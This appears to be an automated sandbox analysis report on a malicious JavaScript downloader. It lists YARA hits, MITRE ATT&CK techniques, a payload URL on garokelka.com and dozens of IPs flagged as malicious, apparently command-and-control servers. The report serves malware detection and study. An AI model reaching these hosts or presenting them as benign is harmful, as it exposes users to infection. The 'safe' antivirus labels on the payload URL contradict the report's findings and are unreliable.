            Source: Yara matchFile source: 00000004.00000002.385257108.000000000047A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.385365210.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.rundll32.exe.570000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.rundll32.exe.490910.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.rundll32.exe.490910.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.385257108.000000000047A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.385365210.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Replication Through Removable Media
            21
            Scripting
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            Credential API Hooking
            12
            Security Software Discovery
            1
            Replication Through Removable Media
            1
            Credential API Hooking
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Non-Standard Port
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            Disable or Modify Tools
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Ingress Tool Transfer
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
            Process Injection
            NTDS11
            Peripheral Device Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
            Scripting
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingData Transfer Size Limits113
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common2
            Obfuscated Files or Information
            Cached Domain Credentials15
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Rundll32
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            File Deletion
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ProjectFunding_450726_Jun01.js0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://garokelka.com/rlvoq0.msi0%Avira URL Cloudsafe
            https://garokelka.com/rlvoq0.msi0C:0%Avira URL Cloudsafe
            https://garokelka.com/$0%Avira URL Cloudsafe
            https://garokelka.com/rlvoq0.msif:randomM0%Avira URL Cloudsafe
            https://garokelka.com/0%Avira URL Cloudsafe
            https://garokelka.com/rlvoq0.msi4571101763103659400%Avira URL Cloudsafe
            https://pdx-col.eum-appdynamics.com0%Avira URL Cloudsafe
            http://pdx-col.eum-appdynamics.com0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            garokelka.com
            217.195.153.225
            truefalse
              unknown
              cisco.com
              72.163.4.185
              truefalse
                high
                www.cisco.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://garokelka.com/rlvoq0.msifalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cisco.com/false
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.cisco.com/c/en_eg/index.htmlP96VU3JU.htm.5.drfalse
                      high
                      https://www.youtube.com/user/ciscoP96VU3JU.htm.5.drfalse
                        high
                        https://www.cisco.com/c/en/us/solutions/service-provider/routed-optical-networking/index.html?ccid=cP96VU3JU.htm.5.drfalse
                          high
                          https://www.cisco.com/c/ar_ae/index.htmlP96VU3JU.htm.5.drfalse
                            high
                            https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m05/cisco-launches-program-for-customers-and-pP96VU3JU.htm.5.drfalse
                              high
                              https://www.cisco.com/c/en_sg/index.htmlP96VU3JU.htm.5.drfalse
                                high
                                https://garokelka.com/$6781be.rbs.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.cisco.com/c/en_dz/index.htmlP96VU3JU.htm.5.drfalse
                                  high
                                  https://www.cisco.com/c/hu_hu/index.htmlP96VU3JU.htm.5.drfalse
                                    high
                                    https://www.cisco.com/site/in/en/index.htmlP96VU3JU.htm.5.drfalse
                                      high
                                      https://software.cisco.com/download/navigator.htmlP96VU3JU.htm.5.drfalse
                                        high
                                        https://www.cisco.com/c/en/us/about/contact-cisco.htmlP96VU3JU.htm.5.drfalse
                                          high
                                          https://www.schema.orgP96VU3JU.htm.5.drfalse
                                            high
                                            https://www.cisco.com/c/en/us/partners/connect-with-a-partner.htmlP96VU3JU.htm.5.drfalse
                                              high
                                              https://www.cisco.com/c/en/us/about/sitemap.htmlP96VU3JU.htm.5.drfalse
                                                high
                                                https://www.cisco.com/c/sv_se/index.htmlP96VU3JU.htm.5.drfalse
                                                  high
                                                  https://www.cisco.com/c/ru_ru/index.htmlP96VU3JU.htm.5.drfalse
                                                    high
                                                    https://learninglocator.cloudapps.cisco.com/#/homeP96VU3JU.htm.5.drfalse
                                                      high
                                                      https://www.cisco.com/c/pl_pl/index.htmlP96VU3JU.htm.5.drfalse
                                                        high
                                                        https://blogs.cisco.com/security/now-is-the-time-to-step-up-your-security?utm_medium=web-referral&utP96VU3JU.htm.5.drfalse
                                                          high
                                                          https://www.cisco.comP96VU3JU.htm.5.drfalse
                                                            high
                                                            https://www.cisco.com/c/fr_dz/index.htmlP96VU3JU.htm.5.drfalse
                                                              high
                                                              https://www.cisco.com/c/de_ch/index.htmlP96VU3JU.htm.5.drfalse
                                                                high
                                                                http://pdx-col.eum-appdynamics.comP96VU3JU.htm.5.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.cisco.com/site/fr/fr/index.htmlP96VU3JU.htm.5.drfalse
                                                                  high
                                                                  https://www.cisco.com/c/nl_nl/index.htmlP96VU3JU.htm.5.drfalse
                                                                    high
                                                                    https://www.cisco.com/site/au/en/index.htmlP96VU3JU.htm.5.drfalse
                                                                      high
                                                                      https://www.cisco.com/c/es_ec/index.htmlP96VU3JU.htm.5.drfalse
                                                                        high
                                                                        https://www.cisco.com/c/en/us/about/legal/trademarks.htmlP96VU3JU.htm.5.drfalse
                                                                          high
                                                                          https://www.cisco.com/c/en/us/about.htmlP96VU3JU.htm.5.drfalse
                                                                            high
                                                                            https://www.cisco.com/c/pt_br/index.htmlP96VU3JU.htm.5.drfalse
                                                                              high
                                                                              https://www.cisco.com/c/th_th/index.htmlP96VU3JU.htm.5.drfalse
                                                                                high
                                                                                https://www.cisco.com/site/de/de/index.htmlP96VU3JU.htm.5.drfalse
                                                                                  high
                                                                                  https://search.cisco.com/search?query=P96VU3JU.htm.5.drfalse
                                                                                    high
                                                                                    http://schema.org/ImageObjectP96VU3JU.htm.5.drfalse
                                                                                      high
                                                                                      https://www.ciscolive.com/global.html?CID=cdchp&TEAM=global_events&MEDIUM=digital_direct&CAMPAIGN=btP96VU3JU.htm.5.drfalse
                                                                                        high
                                                                                        https://www.cisco.com/c/en_my/index.htmlP96VU3JU.htm.5.drfalse
                                                                                          high
                                                                                          https://www.cisco.com/c/es_es/index.htmlP96VU3JU.htm.5.drfalse
                                                                                            high
                                                                                            https://www.cisco.com/c/it_it/index.htmlP96VU3JU.htm.5.drfalse
                                                                                              high
                                                                                              https://www.cisco.com/c/en_il/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                high
                                                                                                https://www.cisco.com/site/cn/zh/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                  high
                                                                                                  https://newsroom.cisco.com/c/r/newsroom/en/us/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                    high
                                                                                                    https://www.cisco.com/c/en_hk/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                      high
                                                                                                      https://www.cisco.com/c/de_at/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                        high
                                                                                                        https://www.cisco.com/c/es_pa/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                          high
                                                                                                          https://www.cisco.com/c/da_dk/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                            high
                                                                                                            https://www.cisco.com/c/ru_ua/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                              high
                                                                                                              https://www.instagram.com/cisco/P96VU3JU.htm.5.drfalse
                                                                                                                high
                                                                                                                https://www.cisco.com/c/en/us/about/accessibility.htmlP96VU3JU.htm.5.drfalse
                                                                                                                  high
                                                                                                                  https://www.cisco.com/c/es_mx/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                    high
                                                                                                                    https://www.cisco.com/c/fr_be/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                      high
                                                                                                                      https://garokelka.com/rlvoq0.msi0C:~DFD56E4E9B73156A44.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DFC8411CD743E6CADD.TMP.1.dr, ~DFAAF580DC072508D1.TMP.1.dr, ~DFEA98AB2A043532AC.TMP.1.dr, ~DFCFA0FDA4AEF3B850.TMP.1.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.cisco.com/c/tr_tr/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                        high
                                                                                                                        https://ciscocx.qualtrics.com/jfe/form/SV_0Tcp9VU8pUm4lBY?Ref&#61;/c/en/us/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                          high
                                                                                                                          https://www.cisco.com/c/en_ph/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                            high
                                                                                                                            https://www.cisco.com/c/es_ar/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                              high
                                                                                                                              https://www.cisco.com/c/no_no/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                high
                                                                                                                                https://www.cisco.com/c/es_cr/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                  high
                                                                                                                                  https://twitter.com/Cisco/P96VU3JU.htm.5.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.cisco.com/c/ar_eg/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.cisco.com/c/ko_kr/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.cisco.com/c/ro_ro/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.cisco.com/site/ca/fr/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.cisco.com/c/nl_be/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                              high
                                                                                                                                              https://duo.com/solutions/risk-based-authentication?utm_medium=web-referral&utm_source=cisco#eyJoYXNP96VU3JU.htm.5.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.cisco.com/c/es_co/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.cisco.com/c/en/us/about/legal/terms-conditions.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.cisco.com/c/pt_pt/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.cisco.com/c/en/us/buy.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.cisco.com/c/uk_ua/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.cisco.com/c/es_pe/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://garokelka.com/rlvoq0.msif:randomMwscript.exe, 00000000.00000002.377798248.000001DCD5B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377308183.000001DCD5B4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377167880.000001DCD5B4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377614513.000001DCD5B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.cisco.com/c/m/en_us/solutions/hybrid-work/workplace-solutions/penn1-lookbook.html?ccid=cP96VU3JU.htm.5.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.cisco.com/c/en/us/training-events/training-certifications.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.cisco.com/c/cs_cz/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.cisco.com/web/fw/i/logo-open-graph.gifP96VU3JU.htm.5.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.cisco.com/c/en/us/about/careers.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.cisco.com/c/en_za/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://pdx-col.eum-appdynamics.comP96VU3JU.htm.5.drfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://community.cisco.com/P96VU3JU.htm.5.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://blogs.cisco.com/networking/it-leaders-contend-with-secure-multicloud-access-the-2023-global-P96VU3JU.htm.5.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.cisco.com/c/vi_vn/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://cdn.appdynamics.comP96VU3JU.htm.5.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cdn.appdynamics.comP96VU3JU.htm.5.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.cisco.com/c/en/us/about/legal/privacy-full.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.cisco.com/c/en/us/about/help.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.cisco.com/site/uk/en/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://garokelka.com/rlvoq0.msi457110176310365940~DF0DDEAC6C9405E7E5.TMP.1.drfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://garokelka.com/6781be.rbs.1.dr, MSI81ED.tmp.1.drfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://www.cisco.com/c/en/us/solutions/design-zone.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.cisco.com/c/en/us/training-events/events.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.cisco.com/site/jp/ja/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.cisco.com/c/es_bz/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.cisco.com/c/zh_hk/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.linkedin.com/company/ciscoP96VU3JU.htm.5.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.cisco.com/P96VU3JU.htm.5.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.cisco.com/c/fr_ch/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.cisco.com/site/ca/en/index.htmlP96VU3JU.htm.5.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          75.143.236.149
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20115CHARTER-20115UStrue
                                                                                                                                                                                                          83.110.223.61
                                                                                                                                                                                                          unknownUnited Arab Emirates
                                                                                                                                                                                                          5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                                                                                                                                          86.195.14.72
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                          84.215.202.8
                                                                                                                                                                                                          unknownNorway
                                                                                                                                                                                                          41164GET-NOGETNorwayNOtrue
                                                                                                                                                                                                          184.182.66.109
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                          80.167.196.79
                                                                                                                                                                                                          unknownDenmark
                                                                                                                                                                                                          3292TDCTDCASDKtrue
                                                                                                                                                                                                          125.99.69.178
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                                                                                                                                          89.32.156.5
                                                                                                                                                                                                          unknownItaly
                                                                                                                                                                                                          48544TECNOADSL-ASITtrue
                                                                                                                                                                                                          161.142.103.187
                                                                                                                                                                                                          unknownMalaysia
                                                                                                                                                                                                          9930TTNET-MYTIMEdotComBerhadMYtrue
                                                                                                                                                                                                          213.64.33.92
                                                                                                                                                                                                          unknownSweden
                                                                                                                                                                                                          3301TELIANET-SWEDENTeliaCompanySEtrue
                                                                                                                                                                                                          114.143.176.236
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          17762HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdINtrue
                                                                                                                                                                                                          24.234.220.88
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                          14.192.241.76
                                                                                                                                                                                                          unknownMalaysia
                                                                                                                                                                                                          9534MAXIS-AS1-APBinariangBerhadMYtrue
                                                                                                                                                                                                          173.88.135.179
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          10796TWC-10796-MIDWESTUStrue
                                                                                                                                                                                                          72.205.104.134
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                          69.160.121.6
                                                                                                                                                                                                          unknownJamaica
                                                                                                                                                                                                          33576DIG001JMtrue
                                                                                                                                                                                                          117.195.17.148
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          9829BSNL-NIBNationalInternetBackboneINtrue
                                                                                                                                                                                                          47.34.30.133
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20115CHARTER-20115UStrue
                                                                                                                                                                                                          70.49.205.198
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          577BACOMCAtrue
                                                                                                                                                                                                          184.181.75.148
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                          84.35.26.14
                                                                                                                                                                                                          unknownNetherlands
                                                                                                                                                                                                          21221INFOPACT-ASTheNetherlandsNLtrue
                                                                                                                                                                                                          41.227.190.59
                                                                                                                                                                                                          unknownTunisia
                                                                                                                                                                                                          2609TN-BB-ASTunisiaBackBoneASTNtrue
                                                                                                                                                                                                          86.168.210.41
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                                                                                                                                          100.4.163.158
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          701UUNETUStrue
                                                                                                                                                                                                          70.50.83.216
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          577BACOMCAtrue
                                                                                                                                                                                                          165.120.169.171
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                                                                                                                                          82.131.141.209
                                                                                                                                                                                                          unknownHungary
                                                                                                                                                                                                          20845DIGICABLEHUtrue
                                                                                                                                                                                                          68.203.69.96
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          11427TWC-11427-TEXASUStrue
                                                                                                                                                                                                          79.92.15.6
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          15557LDCOMNETFRtrue
                                                                                                                                                                                                          64.121.161.102
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          6079RCN-ASUStrue
                                                                                                                                                                                                          96.56.197.26
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          6128CABLE-NET-1UStrue
                                                                                                                                                                                                          178.175.187.254
                                                                                                                                                                                                          unknownMoldova Republic of
                                                                                                                                                                                                          43289TRABIAMDtrue
                                                                                                                                                                                                          125.99.76.102
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                                                                                                                                          81.101.185.146
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          5089NTLGBtrue
                                                                                                                                                                                                          98.187.21.2
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                          72.163.4.185
                                                                                                                                                                                                          cisco.comUnited States
                                                                                                                                                                                                          109CISCOSYSTEMSUSfalse
                                                                                                                                                                                                          92.149.250.113
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                          76.86.31.59
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20001TWC-20001-PACWESTUStrue
                                                                                                                                                                                                          147.147.30.126
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          6871PLUSNETUKInternetServiceProviderGBtrue
                                                                                                                                                                                                          96.87.28.170
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          7922COMCAST-7922UStrue
                                                                                                                                                                                                          75.109.111.89
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          19108SUDDENLINK-COMMUNICATIONSUStrue
                                                                                                                                                                                                          124.122.47.148
                                                                                                                                                                                                          unknownThailand
                                                                                                                                                                                                          17552TRUE-AS-APTrueInternetCoLtdTHtrue
                                                                                                                                                                                                          88.126.94.4
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          12322PROXADFRtrue
                                                                                                                                                                                                          85.57.212.13
                                                                                                                                                                                                          unknownSpain
                                                                                                                                                                                                          12479UNI2-ASEStrue
                                                                                                                                                                                                          103.101.203.177
                                                                                                                                                                                                          unknownSingapore
                                                                                                                                                                                                          133136MYREPUBLIC-SGMyRepublicLtdSGtrue
                                                                                                                                                                                                          94.204.202.106
                                                                                                                                                                                                          unknownUnited Arab Emirates
                                                                                                                                                                                                          15802DU-AS1AEtrue
                                                                                                                                                                                                          47.205.25.170
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          5650FRONTIER-FRTRUStrue
                                                                                                                                                                                                          95.45.50.93
                                                                                                                                                                                                          unknownIreland
                                                                                                                                                                                                          5466EIRCOMInternetHouseIEtrue
                                                                                                                                                                                                          85.61.165.153
                                                                                                                                                                                                          unknownSpain
                                                                                                                                                                                                          12479UNI2-ASEStrue
                                                                                                                                                                                                          80.12.88.148
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                          103.144.201.48
                                                                                                                                                                                                          unknownunknown
                                                                                                                                                                                                          139762MSSOLUTION-AS-APSolutionBDtrue
                                                                                                                                                                                                          102.156.10.183
                                                                                                                                                                                                          unknownTunisia
                                                                                                                                                                                                          37705TOPNETTNtrue
                                                                                                                                                                                                          86.132.236.117
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                                                                                                                                          205.237.67.69
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          11290CC-3272CAtrue
                                                                                                                                                                                                          201.143.215.69
                                                                                                                                                                                                          unknownMexico
                                                                                                                                                                                                          8151UninetSAdeCVMXtrue
                                                                                                                                                                                                          76.178.148.107
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          10838OCEANIC-INTERNET-RRUStrue
                                                                                                                                                                                                          69.242.31.249
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          7922COMCAST-7922UStrue
                                                                                                                                                                                                          85.104.105.67
                                                                                                                                                                                                          unknownTurkey
                                                                                                                                                                                                          9121TTNETTRtrue
                                                                                                                                                                                                          41.186.88.38
                                                                                                                                                                                                          unknownRwanda
                                                                                                                                                                                                          36890MTNRW-ASNRWtrue
                                                                                                                                                                                                          76.16.49.134
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          7922COMCAST-7922UStrue
                                                                                                                                                                                                          90.104.151.37
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                          201.244.108.183
                                                                                                                                                                                                          unknownColombia
                                                                                                                                                                                                          19429ETB-ColombiaCOtrue
                                                                                                                                                                                                          103.42.86.42
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          133660EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLttrue
                                                                                                                                                                                                          116.74.163.130
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                                                                                                                                          105.184.209.194
                                                                                                                                                                                                          unknownSouth Africa
                                                                                                                                                                                                          37457Telkom-InternetZAtrue
                                                                                                                                                                                                          116.120.145.170
                                                                                                                                                                                                          unknownKorea Republic of
                                                                                                                                                                                                          9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                                                                                                          103.139.242.6
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          138798MUTINY-AS-INMutinySystemsPrivateLimitedINtrue
                                                                                                                                                                                                          70.28.50.223
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          577BACOMCAtrue
                                                                                                                                                                                                          217.195.153.225
                                                                                                                                                                                                          garokelka.comNetherlands
                                                                                                                                                                                                          395092SHOCK-1USfalse
                                                                                                                                                                                                          98.145.23.67
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20001TWC-20001-PACWESTUStrue
                                                                                                                                                                                                          81.229.117.95
                                                                                                                                                                                                          unknownSweden
                                                                                                                                                                                                          3301TELIANET-SWEDENTeliaCompanySEtrue
                                                                                                                                                                                                          82.125.44.236
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                          45.243.142.31
                                                                                                                                                                                                          unknownEgypt
                                                                                                                                                                                                          24863LINKdotNET-ASEGtrue
                                                                                                                                                                                                          89.129.109.27
                                                                                                                                                                                                          unknownSpain
                                                                                                                                                                                                          12479UNI2-ASEStrue
                                                                                                                                                                                                          27.109.19.90
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          17625BLAZENET-IN-APBlazeNetsNetworkINtrue
                                                                                                                                                                                                          122.186.210.254
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          9498BBIL-APBHARTIAirtelLtdINtrue
                                                                                                                                                                                                          122.184.143.86
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          9498BBIL-APBHARTIAirtelLtdINtrue
                                                                                                                                                                                                          50.68.186.195
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          6327SHAWCAtrue
                                                                                                                                                                                                          45.62.70.33
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          40440NRTC-CAtrue
